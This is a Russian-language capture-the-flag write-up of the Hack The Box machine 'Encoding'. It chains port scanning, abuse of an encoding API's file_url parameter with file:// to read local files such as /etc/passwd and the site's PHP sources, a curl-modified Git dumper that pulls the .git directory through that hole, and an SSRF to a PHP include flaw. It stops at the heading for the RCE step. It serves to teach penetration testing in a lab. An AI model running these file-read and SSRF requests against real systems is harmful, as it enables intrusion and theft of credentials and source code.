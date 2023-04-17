Се­год­ня мы с тобой прой­дем по цепоч­ке уяз­вимос­тей: от LFI к экс­плу­ата­ции Git, к дру­гой LFI и под конец — RCE. По дороге нам понадо­бит­ся модер­низиро­вать Git-дам­пер, а при прод­вижении будем исполь­зовать выпол­нение кода через Git.

На­ша цель — зах­ватить тре­ниро­воч­ную машину Encoding с пло­щад­ки Hack The Box. Уро­вень слож­ности — сред­ний.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 198 encoding. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr '\ n' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Мы наш­ли два откры­тых пор­та: 22 — служ­ба OpenSSH 8.9p1 и 80 — веб‑сер­вер Apache 2.4.52. Боль­ше ничего инте­рес­ного в резуль­татах ска­ниро­вания нет, поэто­му идем изу­чать веб‑сер­вер.

Точка входа

Бег­лый прос­мотр сай­та выводит нас на API, который работа­ет на отдель­ном под­домене. Добав­ляем новый под­домен в файл / etc/ hosts .

10. 10. 11. 198 encoding. htb haxtables. htb api. haxtables. htb

Об­рати вни­мание, что зап­рашива­емая стра­ница переда­ется в парамет­ре page . В таких слу­чаях сто­ит сра­зу про­верить наличие LFI. Одна­ко най­ти уяз­вимость не уда­лось. Зато на стра­нице есть при­меры кода, как работать с API для кодиро­вания фай­лов, получа­емых по ука­зан­ному URL.

Нем­ного под­пра­вим код, что­бы пос­ле получе­ния закоди­рован­ного фай­ла обра­ботать ответ и декоди­ровать файл.

import requests import json import base64 json_data = { 'action' : 'b64encode' , 'file_url' : 'http:// 10. 10. 14. 78/ test. txt' } response = requests . post ( 'http:// api. haxtables. htb/ v3/ tools/ string/ index. php' , json = json_data ) data = json . loads ( response . text . strip () ) print ( base64 . b64decode ( data [ "data" ]) . decode () )

А теперь зап­росим файл со сво­его веб‑сер­вера:

python3 - m http . server 80

Код работа­ет, файл по ссыл­ке получен. А теперь про­буем изме­нить про­токол с http:/ / на file:/ / , что­бы попытать­ся получить локаль­ный файл с сер­вера. Читать будем / etc/ passwd , для чего изме­ним в коде параметр file_url .

'file_url' : 'file:/// etc/ passwd'

И получа­ем воз­можность читать про­изволь­ные фай­лы.

Точка опоры

Чтение произвольных файлов

Что­бы про­читать фай­лы сай­та, нам нуж­но знать путь к кор­невому катало­гу. В этом нам поможет файл кон­фигура­ции веб‑сер­вера.

'file_url' : 'file:/// etc/ apache2/ sites-enabled/ 000-default. conf'

В ито­ге получа­ем пути к кор­невым катало­гам трех сай­тов. Добав­ляем запись для под­домена image в файл / etc/ hosts , нес­мотря на то что дос­туп к это­му сай­ту раз­решен толь­ко с локаль­ного хос­та.

10. 10. 11. 198 encoding. htb haxtables. htb api. haxtables. htb image. haxtables. htb

Пер­вым делом чита­ем файл index. php , что­бы рас­крыть новые под­клю­чаемые фай­лы.

'file_url' : 'file:/// var/ www/ image/ index. php'

Рас­кры­ваем новый под­клю­чаемый файл utils. php . Прос­мотрим и его.

'file_url' : 'file:/// var/ www/ image/ utils. php'

Изу­чая исходный код, отме­чаем для себя, что в катало­ге есть репози­торий Git. Давай най­дем спо­соб ска­чать его весь.

Git

Для дам­па все­го репози­тория мож­но исполь­зовать ути­литу Dumper. Но так как мы чита­ем фай­лы не нап­рямую, а через уяз­вимость на сер­вере, скрипт нуж­но нем­ного модер­низиро­вать. Най­дем коман­ду, где выпол­няет­ся зап­рос с помощью curl.

Из­меним ее для работы через сер­вис кодиро­вания.

curl 'http:// api. haxtables. htb/ v3/ tools/ string/ index. php' -s -H 'Content-Type: application/ json' --data-binary "{ " action ": " b64encode ", " file_ url ": " file:// / var/ www/ image/ . git/ $objname "} " | jq . data | tr -d '"' | base64 -d > " $target "

Те­перь запус­каем скрипт и получа­ем весь репози­торий.

Для ана­лиза Git я обыч­но исполь­зую прог­рамму gitk. Запус­каем ее из дирек­тории, где содер­жится каталог . git . Мы и так можем читать фай­лы на сер­вере, поэто­му меня прос­то инте­ресо­вало, какие фай­лы и катало­ги на нем есть.

Сра­зу обра­щаем вни­мание на action_handler. php , о котором мы преж­де не зна­ли.

'file_url' : 'file:/// var/ www/ image/ actions/ action_handler. php'

И видим очень опас­ное исполь­зование фун­кции include . Так в нее переда­ется при­нима­емый GET-параметр page . Но мы не можем обра­тить­ся к это­му фай­лу нап­рямую, так как дос­туп к сай­ту image дос­тупен толь­ко с локаль­ного хос­та. Эту LFI мож­но рас­кру­тить до RCE, но нам нуж­на еще уяз­вимость SSRF, что­бы обра­тить­ся к сай­ту image .

Ни­чего инте­рес­ного боль­ше най­ти не получи­лось, поэто­му вер­немся к пер­вому сай­ту и прос­каниру­ем фай­лы PHP с помощью feroxbuster.

feroxbuster -u http:/ / haxtables. htb/ -w php_ files_ common. txt -d 1

На­ходим файл handler. php . Сра­зу получа­ем его содер­жимое.

'file_url' : 'file:/// var/ www/ html/ handler. php'

Сер­вер обра­баты­вает параметр uri_path и переда­ет его в фун­кцию make_api_call . Получим код этой фун­кции из фай­ла utils. php .

'file_url' : 'file:/// var/ www/ api/ utils. php'

Эта фун­кция нуж­на для отправ­ки зап­роса на ука­зан­ный URL. Вот мы и узна­ли спо­соб выпол­нить зап­рос к action_handler. php , где мы наш­ли вызов include .

PHP include RCE